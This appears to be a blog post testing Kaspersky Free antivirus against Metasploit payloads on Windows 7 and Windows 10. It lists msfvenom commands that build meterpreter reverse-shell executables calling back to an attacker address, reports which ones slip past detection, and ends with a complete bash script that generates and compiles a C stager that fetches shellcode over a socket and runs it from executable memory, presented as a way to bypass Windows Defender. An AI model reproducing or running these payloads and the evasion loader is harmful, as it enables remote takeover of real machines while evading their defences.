Kaspersky has finally released their free version (no trial) of Antivirus for Windows platform, and as they claim, in return, it will use data you contribute to improve machine learning across its products.
So lest check out how this product handles various Metasploit payloads and encoders. I have made two sets of tests, one n fully patched Windows 7 SP1 x64 (ver. 6.1.7601) and one on Windows 10 x64 (build 10586)
Test 1) Windows 7 SP1 x64(ver 6.1.7601)
Lest prepare a set of executable payloads first
32bit tests ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp.exe ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp.exe ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https.exe ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https.exe 64bit tests ./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_tcp64.exe ./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_tcp64.exe ./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -f exe > 01.reverse_https64.exe ./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe Java test ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.11.6 LPORT=443 > test.jar
And put these binaries up on a SMB share so we can use them later from the VMs
So once we have Kaspersky free installed and configured https://www.kaspersky.com/free-antivirus
We can start the actual tests. As you can see it performs fine and picks up most of the generated executable payloads via meterpreter
However it fails on this one
./msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_https LHST=192.168.11.6 LPORT=443 -b '\x00' -f exe > 02.reverse_https64.exe
As you can see from the video demo we can get a meterpreter shell quite easily via msfvenom generated executables (no hackery involved)
Test 2) Windows 10 x64 (build 10586)
Now here Kaspersky Free has failed badly. It looks like the inbuilt MS Defender still protects the system (and does a better job to detection of the above generated msfvenom binaries) For some reason the Kaspersky AV engine only picks up the JAR meterpreter payload, while Windows Defender takes care of the rest of the executables. Maybe its because I use this old Windows 10 build (10586) Not sure, but it definitely does not work well on this platform.
You can see the output in this short video
I had to use a custom exe payload generator to bypass Windows Defender instead :)
#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port
echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("bad\n"); '>> temp.c
echo ' WSACleanup(); '>> temp.c
echo ' exit(1);'>> temp.c
echo ' }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("r %s\n", error);'>> temp.c
echo ' closesocket(my_socket);'>> temp.c
echo ' WSACleanup();'>> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;'>> temp.c
echo ' int nret = 0;'>>temp.c
echo ' void * startb = buffer;'>> temp.c
echo ' while (tret < len) {'>>temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo ' startb += nret;'>> temp.c
echo ' tret += nret;'>>temp.c
echo ' if (nret == SOCKET_ERROR)'>> temp.c
echo ' punt(my_socket, "no data");'>> temp.c
echo ' }'>>temp.c
echo ' return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c
echo ' punt(my_socket, ".");'>>temp.c
echo ' target = gethostbyname(targetip);'>>temp.c
echo ' if (target == NULL)'>>temp.c
echo ' punt(my_socket, "..");'>>temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo ' sock.sin_family = AF_INET;'>> temp.c
echo ' sock.sin_port = htons(port);'>>temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo ' punt(my_socket, "...");'>>temp.c
echo ' return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo ' FreeConsole();'>>temp.c
echo ' Sleep(10);'>>temp.c
echo ' ULONG32 size;'>>temp.c
echo ' char * buffer;'>>temp.c
echo ' void (*function)();'>>temp.c
echo ' winsock_init();'>> temp.c
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo ' if (count != 4 || size <= 0)'>>temp.c
echo ' punt(my_socket, "error lenght\n");'>>temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo ' if (buffer == NULL)'>>temp.c
echo ' punt(my_socket, "error in buf\n");'>>temp.c
echo ' buffer[0] = 0xBF;'>>temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo ' function = (void (*)())buffer;'>>temp.c
echo ' function();'>>temp.c
echo ' return 0;'>>temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows
ls -la temp.c
strip payload.exe
file=`ls -la payload.exe` ; echo '(+)' $file
